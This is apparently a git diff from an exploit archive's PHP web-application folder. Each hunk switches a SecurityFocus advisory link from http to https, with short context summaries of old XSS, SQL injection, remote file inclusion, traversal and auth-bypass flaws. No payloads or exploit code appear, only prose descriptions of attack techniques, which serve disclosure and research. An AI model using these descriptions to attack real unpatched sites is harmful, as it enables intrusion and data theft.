+++ b/exploits/php/webapps/22922.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8212/info +source: https://www.securityfocus.com/bid/8212/info Ultimate Bulletin Board has been reported prone to a HTML injection vulnerability. diff --git a/exploits/php/webapps/22925.txt b/exploits/php/webapps/22925.txt index 7e9731fe8..5118b78a7 100644 --- a/exploits/php/webapps/22925.txt +++ b/exploits/php/webapps/22925.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8220/info +source: https://www.securityfocus.com/bid/8220/info eStore is prone to a path disclosure vulnerability. diff --git a/exploits/php/webapps/22927.txt b/exploits/php/webapps/22927.txt index 45f4c8110..9d9b0c02c 100644 --- a/exploits/php/webapps/22927.txt +++ b/exploits/php/webapps/22927.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8227/info +source: https://www.securityfocus.com/bid/8227/info SimpNews is prone to a vulnerability that may permit remote attackers to include and execute malicious PHP scripts. Remote users, under some PHP configurations, may influence a Simpnews URI variable. This variable is used in the include path for several SimpNews configuration scripts. By influencing the include path so that it points to a malicious PHP script on a remote system, it is possible to cause arbitrary PHP code to be executed. diff --git a/exploits/php/webapps/22940.txt b/exploits/php/webapps/22940.txt index aa1134533..28e1fd9ec 100644 --- a/exploits/php/webapps/22940.txt +++ b/exploits/php/webapps/22940.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8235/info +source: https://www.securityfocus.com/bid/8235/info The Drupal content management system is prone to a cross-site scripting vulnerability. This issue is exposed through the main page and through other sub-pages. An attacker may exploit this issue by including hostile HTML and script code in a malicious link to Drupal. This code may be rendered in the web browser of a user who visits the link. 
diff --git a/exploits/php/webapps/22941.txt b/exploits/php/webapps/22941.txt index 1cccdb592..82ed8dafd 100644 --- a/exploits/php/webapps/22941.txt +++ b/exploits/php/webapps/22941.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8236/info +source: https://www.securityfocus.com/bid/8236/info It has been reported that attackers may be able to modify the 'location' variable passed to the index.php file to cause the Web server to return arbitrary files. This script is prone to a directory traversal vulnerability, allowing attackers to retrieve any file residing on the filesystem readable by the Web server user. diff --git a/exploits/php/webapps/22942.txt b/exploits/php/webapps/22942.txt index bdfbb3aaa..08c43a945 100644 --- a/exploits/php/webapps/22942.txt +++ b/exploits/php/webapps/22942.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8237/info +source: https://www.securityfocus.com/bid/8237/info It has been reported that an information disclosure issue exists in WebCalendar. This may allow an attacker to gain unauthorized read access to potentially sensitive information with the privileges of the web server process. diff --git a/exploits/php/webapps/22948.txt b/exploits/php/webapps/22948.txt index 13b466df7..242f080bb 100644 --- a/exploits/php/webapps/22948.txt +++ b/exploits/php/webapps/22948.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8249/info +source: https://www.securityfocus.com/bid/8249/info moregroupware is prone to a vulnerability that may permit remote attackers to include and execute malicious PHP scripts. Remote users, under some PHP configurations, may influence a moregroupware URI variable. This variable is used in the include path for several moregroupware configuration scripts. By influencing the include path so that it points to a malicious PHP script on a remote system, it is possible to cause arbitrary PHP code to be executed. 
diff --git a/exploits/php/webapps/22953.txt b/exploits/php/webapps/22953.txt index 952816653..f7c3491ad 100644 --- a/exploits/php/webapps/22953.txt +++ b/exploits/php/webapps/22953.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8270/info +source: https://www.securityfocus.com/bid/8270/info PHP-Gastebuch has been reported prone to multiple information disclosure vulnerabilities. The issue presents itself because the affected software fails to sufficiently control access to sensitive files contained in the PHP-Gastebuch installation. diff --git a/exploits/php/webapps/22955.html b/exploits/php/webapps/22955.html index bab9f2e46..2982fdfbb 100644 --- a/exploits/php/webapps/22955.html +++ b/exploits/php/webapps/22955.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8271/info +source: https://www.securityfocus.com/bid/8271/info It has been reported that a script contained in paFileDB does not properly verify user credentials before accepting files for upload. As a result, remote attackers may be able to upload files to the Web server. After a file has been uploaded, it may be possible for the attacker to execute the file remotely. diff --git a/exploits/php/webapps/22956.txt b/exploits/php/webapps/22956.txt index 3f9265ba0..433eda781 100644 --- a/exploits/php/webapps/22956.txt +++ b/exploits/php/webapps/22956.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8273/info +source: https://www.securityfocus.com/bid/8273/info e107 Website System 'db.php' has been reported prone to an information disclosure vulnerability. diff --git a/exploits/php/webapps/22958.txt b/exploits/php/webapps/22958.txt index 24af59ec0..2babc7069 100644 --- a/exploits/php/webapps/22958.txt +++ b/exploits/php/webapps/22958.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8279/info +source: https://www.securityfocus.com/bid/8279/info The e107 content management system is prone to an HTML injection vulnerability. This issue is exposed through the class2.php script. An attacker may exploit this issue by including hostile HTML and script code in certain fields within the form. This code may be rendered in the web browser of a user who views the site. diff --git a/exploits/php/webapps/22960.txt b/exploits/php/webapps/22960.txt index 91f3dbcf8..48f547f8b 100644 --- a/exploits/php/webapps/22960.txt +++ b/exploits/php/webapps/22960.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8286/info +source: https://www.securityfocus.com/bid/8286/info PBLang is prone to an HTML injection vulnerability. An attacker may exploit this issue by including hostile HTML and script code encapsulated in PBLang tags, when posting to the bulletin board. Attacker supplied code may be rendered in the web browser of a user who views these areas of the site. This would occur in the security context of the site hosting PBLang. diff --git a/exploits/php/webapps/22961.txt b/exploits/php/webapps/22961.txt index a04c57b09..b006568a1 100644 --- a/exploits/php/webapps/22961.txt +++ b/exploits/php/webapps/22961.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8288/info +source: https://www.securityfocus.com/bid/8288/info Gallery is prone to a cross-site scripting vulnerability. This issue is present in the search engine facility provided by the software. An attacker could exploit this issue by constructing a malicious link to the search engine that contains hostile HTML and script code. Attacker-supplied code could be rendered in the browser of a user who follows such a link. diff --git a/exploits/php/webapps/22977.txt b/exploits/php/webapps/22977.txt index b07e823df..afa090bed 100644 --- a/exploits/php/webapps/22977.txt +++ b/exploits/php/webapps/22977.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8321/info +source: https://www.securityfocus.com/bid/8321/info MOD Guthabenhack For Woltlab Burning Board reported prone to an SQL injection vulnerability. diff --git a/exploits/php/webapps/22986.txt b/exploits/php/webapps/22986.txt index 9f58e134b..8ffab9c85 100644 --- a/exploits/php/webapps/22986.txt +++ b/exploits/php/webapps/22986.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8339/info +source: https://www.securityfocus.com/bid/8339/info It is possible to create an authentication or access control page, using Dreamweaver MX PHP Authentication Suite. This script will generate an error page that contains dynamic content when a user fails to authenticate correctly to the site. diff --git a/exploits/php/webapps/22990.txt b/exploits/php/webapps/22990.txt index f693b0ed6..40e9c2f1e 100644 --- a/exploits/php/webapps/22990.txt +++ b/exploits/php/webapps/22990.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8354/info +source: https://www.securityfocus.com/bid/8354/info vBulletin may be prone to an HTML injection vulnerability. This issue is exposed through inadequate sanitization of user input for certain fields within the register.php script. An attacker may exploit this issue by including hostile HTML and script code in fields that may be displayed in posts to the message board, or the user's profile. This code may be rendered in the web browser of a user who views the malicious message. diff --git a/exploits/php/webapps/22995.txt b/exploits/php/webapps/22995.txt index c54b5b594..e2a1b6448 100644 --- a/exploits/php/webapps/22995.txt +++ b/exploits/php/webapps/22995.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8368/info +source: https://www.securityfocus.com/bid/8368/info C-Cart is prone to a path disclosure vulnerability. Passing invalid data as a URI parameter to several C-Cart scripts will cause an error message to be displayed, which contains installation path information. diff --git a/exploits/php/webapps/22997.txt b/exploits/php/webapps/22997.txt index 27203e333..469d7bcda 100644 --- a/exploits/php/webapps/22997.txt +++ b/exploits/php/webapps/22997.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8374/info +source: https://www.securityfocus.com/bid/8374/info It has been reported that a cross site scripting vulnerability exists in the Downlaods and Web_Links modules of PostNuke. It is possible that an attacker may construct a link containing malicious script code that could be executed in a browser of a user who visits the link. diff --git a/exploits/php/webapps/22998.txt b/exploits/php/webapps/22998.txt index a1e260f43..e4524226c 100644 --- a/exploits/php/webapps/22998.txt +++ b/exploits/php/webapps/22998.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8374/info +source: https://www.securityfocus.com/bid/8374/info It has been reported that a cross site scripting vulnerability exists in the Downlaods and Web_Links modules of PostNuke. It is possible that an attacker may construct a link containing malicious script code that could be executed in a browser of a user who visits the link. diff --git a/exploits/php/webapps/23000.txt b/exploits/php/webapps/23000.txt index 62f06866a..69e0a3733 100644 --- a/exploits/php/webapps/23000.txt +++ b/exploits/php/webapps/23000.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8380/info +source: https://www.securityfocus.com/bid/8380/info geeeekShop is prone to multiple information disclosure vulnerabilities. Passing invalid data as URI parameters to geeeekShop scripts, will cause an error message to be displayed, which contains installation path information. Additionally it has been reported that a remote attacker may access site configuration scripts, which may lead to the disclosure of potentially sensitive information. diff --git a/exploits/php/webapps/23001.txt b/exploits/php/webapps/23001.txt index 78fdf14b7..dc8b5948f 100644 --- a/exploits/php/webapps/23001.txt +++ b/exploits/php/webapps/23001.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8381/info +source: https://www.securityfocus.com/bid/8381/info Invision Power Board admin.php script reported prone to a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/23008.txt b/exploits/php/webapps/23008.txt index d403eb72e..22dc9d7d3 100644 --- a/exploits/php/webapps/23008.txt +++ b/exploits/php/webapps/23008.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8384/info +source: https://www.securityfocus.com/bid/8384/info DCForum+ is prone to an HTML injection vulnerability. An attacker may exploit this issue by including hostile HTML and script code in the subject field of posts to the bulletin board. This is because the script that processes posts does not sufficiently sanitize user input, allowing attackers to embed HTML and script commands within the post. This code may be rendered in the web browser of a user who views these areas of the site. This would occur in the security context of the site hosting DCForum+. diff --git a/exploits/php/webapps/23009.txt b/exploits/php/webapps/23009.txt index b34900a4f..26493b688 100644 --- a/exploits/php/webapps/23009.txt +++ b/exploits/php/webapps/23009.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8385/info +source: https://www.securityfocus.com/bid/8385/info Stellar Docs will disclose path information in an error page in response to a request for an invalid request for a web resource. This could disclose information that could be useful in further attacks against the system. It should be noted the error output indicates that a database function has failed, which may be due to a more serious issue, such as SQL injection. diff --git a/exploits/php/webapps/23010.txt b/exploits/php/webapps/23010.txt index 503a0883a..dd5562381 100644 --- a/exploits/php/webapps/23010.txt +++ b/exploits/php/webapps/23010.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8386/info +source: https://www.securityfocus.com/bid/8386/info It has been reported that Better Basket Pro (BBPro) Store Builder may reveal path information under some circumstances. This may result a directed attack against system resources. diff --git a/exploits/php/webapps/23011.txt b/exploits/php/webapps/23011.txt index 6eb257a26..c8e5b3865 100644 --- a/exploits/php/webapps/23011.txt +++ b/exploits/php/webapps/23011.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8388/info +source: https://www.securityfocus.com/bid/8388/info A cross-site scripting vulnerability has been reported in the index.php script of PHPOutSourcing Zorum. Because of this, an attacker may be able to execute HTML and script code in the browsers of target users in the security context of the site hosting the vulnerable script. diff --git a/exploits/php/webapps/23012.txt b/exploits/php/webapps/23012.txt index 06d4fc1bd..a124ad33f 100644 --- a/exploits/php/webapps/23012.txt +++ b/exploits/php/webapps/23012.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8389/info +source: https://www.securityfocus.com/bid/8389/info News Wizard will disclose path information in an error page in response to a request for an invalid request for a web resource. This could disclose information that could be useful in further attacks against the system. diff --git a/exploits/php/webapps/23013.txt b/exploits/php/webapps/23013.txt index 1e37c5c46..532a8f462 100644 --- a/exploits/php/webapps/23013.txt +++ b/exploits/php/webapps/23013.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8390/info +source: https://www.securityfocus.com/bid/8390/info Multiple SQL injection vulnerabilities have been reported in PHP Website. These issue may be exploited by sending a malicious request to the calendar script. Possible consequencs of exploitation include compromise of the site and disclosure of sensitive information. diff --git a/exploits/php/webapps/23014.txt b/exploits/php/webapps/23014.txt index fffc06242..762763ff1 100644 --- a/exploits/php/webapps/23014.txt +++ b/exploits/php/webapps/23014.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8393/info +source: https://www.securityfocus.com/bid/8393/info PHP Website is a web site content management system that allows for easy maintainance and administration of interactive community-driven websites. diff --git a/exploits/php/webapps/23015.txt b/exploits/php/webapps/23015.txt index b73d44931..2989d55b4 100644 --- a/exploits/php/webapps/23015.txt +++ b/exploits/php/webapps/23015.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8393/info +source: https://www.securityfocus.com/bid/8393/info PHP Website is a web site content management system that allows for easy maintainance and administration of interactive community-driven websites. diff --git a/exploits/php/webapps/23016.txt b/exploits/php/webapps/23016.txt index 4b04e2b3c..59bdb3e9f 100644 --- a/exploits/php/webapps/23016.txt 
+++ b/exploits/php/webapps/23016.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8393/info +source: https://www.securityfocus.com/bid/8393/info PHP Website is a web site content management system that allows for easy maintainance and administration of interactive community-driven websites. diff --git a/exploits/php/webapps/23017.txt b/exploits/php/webapps/23017.txt index 8e0fddf33..da1bcf4a0 100644 --- a/exploits/php/webapps/23017.txt +++ b/exploits/php/webapps/23017.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8393/info +source: https://www.securityfocus.com/bid/8393/info PHP Website is a web site content management system that allows for easy maintainance and administration of interactive community-driven websites. diff --git a/exploits/php/webapps/23018.txt b/exploits/php/webapps/23018.txt index 95587c443..7bf46c717 100644 --- a/exploits/php/webapps/23018.txt +++ b/exploits/php/webapps/23018.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8396/info +source: https://www.securityfocus.com/bid/8396/info A vulnerability has been reported in Zorum message board software that allows a remote attacker to send a malformed HTTP request resulting in a disclosure of the installation path. diff --git a/exploits/php/webapps/23020.txt b/exploits/php/webapps/23020.txt index e43bbd7bc..931749ce6 100644 --- a/exploits/php/webapps/23020.txt +++ b/exploits/php/webapps/23020.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8401/info +source: https://www.securityfocus.com/bid/8401/info HostAdmin is prone to a path disclosure vulnerability. Passing invalid data to the HostAdmin site will cause an error message to be displayed, which contains installation path information. diff --git a/exploits/php/webapps/23026.txt b/exploits/php/webapps/23026.txt index 57ef4b4c6..16a8866b0 100644 --- a/exploits/php/webapps/23026.txt +++ b/exploits/php/webapps/23026.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8414/info +source: https://www.securityfocus.com/bid/8414/info Xoops BBCode has been reported prone to an HTML injection vulnerability. It has been reported that an attacker may inject malicious script into areas of Xoops where BBCode is rendered. This issue is due to a lack of sufficient sanitization performed on user supplied BBCode tags. Injected code may be rendered in the web browser of a user who views vulnerable areas of the site. This would occur in the security context of the site hosting Xoops and its related modules. diff --git a/exploits/php/webapps/23027.txt b/exploits/php/webapps/23027.txt index 2cc246431..4c43e4399 100644 --- a/exploits/php/webapps/23027.txt +++ b/exploits/php/webapps/23027.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8416/info +source: https://www.securityfocus.com/bid/8416/info A file include vulnerability has been reported in the htmltags.php module of HolaCMS. This problem may allow an attacker to access potentially sensitive information reserved for adminstration. It has also been reported that some files included via exploitation may allow for information to be edited. diff --git a/exploits/php/webapps/23036.txt b/exploits/php/webapps/23036.txt index 36d0d19c1..77e54288a 100644 --- a/exploits/php/webapps/23036.txt +++ b/exploits/php/webapps/23036.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8430/info +source: https://www.securityfocus.com/bid/8430/info MatrikzGB Guestbook is prone to a vulnerability that may permit guestbook users to gain administrative rights. It is possible to exploit this issue by manipulating URI parameters. diff --git a/exploits/php/webapps/23039.txt b/exploits/php/webapps/23039.txt index d7b04999b..4f06fd799 100644 --- a/exploits/php/webapps/23039.txt +++ b/exploits/php/webapps/23039.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8441/info +source: https://www.securityfocus.com/bid/8441/info Fusion News is prone to an access validation error allowing a user to add arbitrary user/administrator accounts through manipulating URI parameters. diff --git a/exploits/php/webapps/23057.txt b/exploits/php/webapps/23057.txt index 22ce1bb56..b4caff10a 100644 --- a/exploits/php/webapps/23057.txt +++ b/exploits/php/webapps/23057.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8488/info +source: https://www.securityfocus.com/bid/8488/info A file include vulnerability has been reported in the nphpd.php module of newsPHP that may permit an attacker to include and execute malicious script code on a vulnerable host. diff --git a/exploits/php/webapps/23058.txt b/exploits/php/webapps/23058.txt index 391f9ff5c..0889032bf 100644 --- a/exploits/php/webapps/23058.txt +++ b/exploits/php/webapps/23058.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8489/info +source: https://www.securityfocus.com/bid/8489/info A vulnerability is reported to exist in newPHP that may allow an attacker to gain access to a vulnerable host due to improper verification of authentication credentials. diff --git a/exploits/php/webapps/23060.txt b/exploits/php/webapps/23060.txt index be8556d87..5bc1d460d 100644 --- a/exploits/php/webapps/23060.txt +++ b/exploits/php/webapps/23060.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8499/info +source: https://www.securityfocus.com/bid/8499/info A vulnerability has been reported for Py-Membres that allows remote attackers to obtain administrative privileges on vulnerable installations. diff --git a/exploits/php/webapps/23061.txt b/exploits/php/webapps/23061.txt index 671351c16..4900ead67 100644 --- a/exploits/php/webapps/23061.txt +++ b/exploits/php/webapps/23061.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8500/info +source: https://www.securityfocus.com/bid/8500/info A vulnerability has been reported for Py-Membres that allows remote attackers to modify the logic of SQL queries. diff --git a/exploits/php/webapps/23064.txt b/exploits/php/webapps/23064.txt index 592c4ab46..ed8aa8966 100644 --- a/exploits/php/webapps/23064.txt +++ b/exploits/php/webapps/23064.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8502/info +source: https://www.securityfocus.com/bid/8502/info An SQL injection vulnerability has been reported in Attila PHP that could allow an attacker to gain unauthorized privileged access to a target site. This could be accomplished by requesting a URI including parameters designed to influence the results of specific user verification checks. Privileged access to a site implementing Attila PHP could allow an attacker to gain sensitive information or launch other attacks. diff --git a/exploits/php/webapps/23065.txt b/exploits/php/webapps/23065.txt index 6236878ec..ee00f5ba8 100644 --- a/exploits/php/webapps/23065.txt +++ b/exploits/php/webapps/23065.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8504/info +source: https://www.securityfocus.com/bid/8504/info cross-site scripting vulnerability has been reported for miniPortail. The vulnerability exists due to insufficient sanitization of some user-supplied values. Specifically, malicious HTML code is not sanitized from a URI parameter passed to miniPortail. diff --git a/exploits/php/webapps/23067.txt b/exploits/php/webapps/23067.txt index 6c62b5c45..649b90a08 100644 --- a/exploits/php/webapps/23067.txt +++ b/exploits/php/webapps/23067.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8506/info +source: https://www.securityfocus.com/bid/8506/info It has been reported that eNdonesia is prone to a cross-site scripting vulnerability that may allow a remote attacker to execute HTML or script code in a victim's browser. The issue reportedly exists in the mod.php script via the 'mod' URI parameter. diff --git a/exploits/php/webapps/23072.txt b/exploits/php/webapps/23072.txt index 98a8e2dff..9c716ecd0 100644 --- a/exploits/php/webapps/23072.txt +++ b/exploits/php/webapps/23072.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8519/info +source: https://www.securityfocus.com/bid/8519/info The 'invitefriends.php3' script of Ezboard has been reported prone to cross-site scripting attacks. The issue occurs due to a lack of sufficient sanitization performed on user-supplied URI parameters. This issue could be exploited to cause hostile HTML and script code to be rendered in the browser of a user who is enticed to visit a malicious link to the vulnerable script. diff --git a/exploits/php/webapps/23084.txt b/exploits/php/webapps/23084.txt index 0823281a9..f625ee49d 100644 --- a/exploits/php/webapps/23084.txt +++ b/exploits/php/webapps/23084.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8520/info +source: https://www.securityfocus.com/bid/8520/info It has been reported that TSguestbook may be prone to HTML injection attacks. The problem is said to occur due to insufficient sanitization of user-supplied input within the 'message' field. As a result, an attacker may post a guestbook entry including malicious HTML or script code within the said field. This could result in the execution of arbitrary code within the browser of an unsuspecting guestbook user. diff --git a/exploits/php/webapps/23099.txt b/exploits/php/webapps/23099.txt index 26ff9e340..17786bebc 100644 --- a/exploits/php/webapps/23099.txt +++ b/exploits/php/webapps/23099.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8540/info +source: https://www.securityfocus.com/bid/8540/info It has been reported that WebCalendar may be prone to multiple SQL injection issues in the view_t.php, view_w.php, view_v.php, and login.php modules of the software. The problems arise from a lack of sufficient sanitization of user-supplied input before being included in database queries. diff --git a/exploits/php/webapps/23103.txt b/exploits/php/webapps/23103.txt index 43c9824f9..dd028d0fe 100644 --- a/exploits/php/webapps/23103.txt +++ b/exploits/php/webapps/23103.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8551/info +source: https://www.securityfocus.com/bid/8551/info A problem has been reported in the checking of input by Digital Scribe, potentially allow for cross-site scripting attacks. Because of this, it may be possible for an attacker to steal cookie authentication credentials or launch other attacks. diff --git a/exploits/php/webapps/23125.txt b/exploits/php/webapps/23125.txt index afc740905..5d26647bf 100644 --- a/exploits/php/webapps/23125.txt +++ b/exploits/php/webapps/23125.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8570/info +source: https://www.securityfocus.com/bid/8570/info phpBB BBCode has been reported prone to an HTML injection vulnerability. It has been reported that an attacker may inject malicious script into areas of phpBB where BBCode is rendered, for example, bulletin board posts or private messages. This issue is due to a lack of sufficient sanitization performed on user supplied URL BBCode tags. diff --git a/exploits/php/webapps/23129.txt b/exploits/php/webapps/23129.txt index 424ae8f8f..ccae08ab2 100644 --- a/exploits/php/webapps/23129.txt +++ b/exploits/php/webapps/23129.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8575/info +source: https://www.securityfocus.com/bid/8575/info Invision Power Board is prone to a cross-site scripting vulnerability. It has been reported that a remote attacker may construct a malicious link to the index.php script and supply arbitrary HTML code as a value for the 'showtopic' URI parameter. If this link is followed, the content of the URI parameter will be rendered in the browser of the user who followed the link. diff --git a/exploits/php/webapps/23140.txt b/exploits/php/webapps/23140.txt index 610e3b1d3..4f8171961 100644 --- a/exploits/php/webapps/23140.txt +++ b/exploits/php/webapps/23140.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8613/info +source: https://www.securityfocus.com/bid/8613/info It has been reported that vbPortal is prone to SQL injection attacks when authentication users. The problem occurs due to insufficient sanitization of the $aid variable, used to store the name of the authenticating user. As a result, an attacker may supply data within the username designed to prematurely terminate the string, and influence the logic of the current SQL query. This may be exploited to expose sensitive information, or potentially to launch attacks against the underlying database. diff --git a/exploits/php/webapps/23158.txt b/exploits/php/webapps/23158.txt index e394785c3..fe4ea87d3 100644 --- a/exploits/php/webapps/23158.txt +++ b/exploits/php/webapps/23158.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8647/info +source: https://www.securityfocus.com/bid/8647/info It has been reported that Mambo Open Source Server is prone to multiple input validation vulnerabilities that may allow remote attackers to inject malicious SQL syntax into database queries and send anonymous e-mail to arbitrary users. diff --git a/exploits/php/webapps/23159.txt b/exploits/php/webapps/23159.txt index 2b642999b..9ca51f72b 100644 --- a/exploits/php/webapps/23159.txt 
+++ b/exploits/php/webapps/23159.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8647/info +source: https://www.securityfocus.com/bid/8647/info It has been reported that Mambo Open Source Server is prone to multiple input validation vulnerabilities that may allow remote attackers to inject malicious SQL syntax into database queries and send anonymous e-mail to arbitrary users. diff --git a/exploits/php/webapps/23160.txt b/exploits/php/webapps/23160.txt index 8c2bc5784..409d805a7 100644 --- a/exploits/php/webapps/23160.txt +++ b/exploits/php/webapps/23160.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8647/info +source: https://www.securityfocus.com/bid/8647/info It has been reported that Mambo Open Source Server is prone to multiple input validation vulnerabilities that may allow remote attackers to inject malicious SQL syntax into database queries and send anonymous e-mail to arbitrary users. diff --git a/exploits/php/webapps/23163.txt b/exploits/php/webapps/23163.txt index 059a42902..f410d7f2b 100644 --- a/exploits/php/webapps/23163.txt +++ b/exploits/php/webapps/23163.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8659/info +source: https://www.securityfocus.com/bid/8659/info It has been reported that Powerslave Portalmanager is prone to an information disclosure issue that may allow remote attackers to gain access to sensitive information about the underlying database structure. The problem is reported to exist in the sql_id parameter. An attacker may insert malformed SQL queries in sql_id, resulting in the software generating an error message and disclosing sensitive database information. Although unconfirmed attackers may also be able to execute arbitrary SQL commands under certain circumstances. diff --git a/exploits/php/webapps/23164.txt b/exploits/php/webapps/23164.txt index 3e4d25c65..486cefa8f 100644 --- a/exploits/php/webapps/23164.txt +++ b/exploits/php/webapps/23164.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8663/info +source: https://www.securityfocus.com/bid/8663/info It has been reported that myPHPNuke is prone to a SQL injection vulnerability that may allow a remote attacker to inject malicious SQL syntax into database queries. The issue may exist in the auth.in.php module of the software. diff --git a/exploits/php/webapps/23175.txt b/exploits/php/webapps/23175.txt index e07ddc51a..23bceced9 100644 --- a/exploits/php/webapps/23175.txt +++ b/exploits/php/webapps/23175.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8692/info +source: https://www.securityfocus.com/bid/8692/info It has been reported that yMonda Thread-IT is prone to a HTML injection vulnerability that may allow an attacker to execute HTML code in a user's browser. The issue is reported to be present in the 'Topic Title', 'Name', and 'Message' fields. This problem is due to insufficient sanitization of user-supplied input. diff --git a/exploits/php/webapps/23192.txt b/exploits/php/webapps/23192.txt index 51bb27fb0..95c69c210 100644 --- a/exploits/php/webapps/23192.txt +++ b/exploits/php/webapps/23192.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8717/info +source: https://www.securityfocus.com/bid/8717/info It has been reported that one of the scripts included with GuppY is vulnerable to an HTML injection attack. The script, "postguest.php", does not perform input validation to prevent the inclusion of HTML/script content in messages posted to the portal by remote clients. The flaw is present in the implementation of the "[c]" tag, which can be used by users posting messages in the forum or in the guestbook components of GuppY portals. diff --git a/exploits/php/webapps/23193.txt b/exploits/php/webapps/23193.txt index 1cba4c04e..db69a006e 100644 --- a/exploits/php/webapps/23193.txt +++ b/exploits/php/webapps/23193.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8718/info +source: https://www.securityfocus.com/bid/8718/info Geeklog is prone to multiple vulnerabilities, including cross-site scripting and SQL injection issues. Exploitation of these issues could permit unauthorized access to user accounts and sensitive information. diff --git a/exploits/php/webapps/23194.txt b/exploits/php/webapps/23194.txt index ff8d1b075..d65d5d05a 100644 --- a/exploits/php/webapps/23194.txt +++ b/exploits/php/webapps/23194.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8718/info +source: https://www.securityfocus.com/bid/8718/info Geeklog is prone to multiple vulnerabilities, including cross-site scripting and SQL injection issues. Exploitation of these issues could permit unauthorized access to user accounts and sensitive information. diff --git a/exploits/php/webapps/23205.txt b/exploits/php/webapps/23205.txt index f49883ede..30d3d7c5e 100644 --- a/exploits/php/webapps/23205.txt +++ b/exploits/php/webapps/23205.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8739/info +source: https://www.securityfocus.com/bid/8739/info Multiple SQL Injection vulnerabilities have been discovered that affect DCP-Portal scripts. These issues are likely due to a lack of sufficient sanitization performed on user supplied URI parameters. Attacks have been demonstrated that inject partial SQL queries, as values for URI parameters, in a manner that influences DCP-Portal SQL query logic to the attackers benefit. diff --git a/exploits/php/webapps/23206.txt b/exploits/php/webapps/23206.txt index 87d0cbeaa..31084368c 100644 --- a/exploits/php/webapps/23206.txt +++ b/exploits/php/webapps/23206.txt 
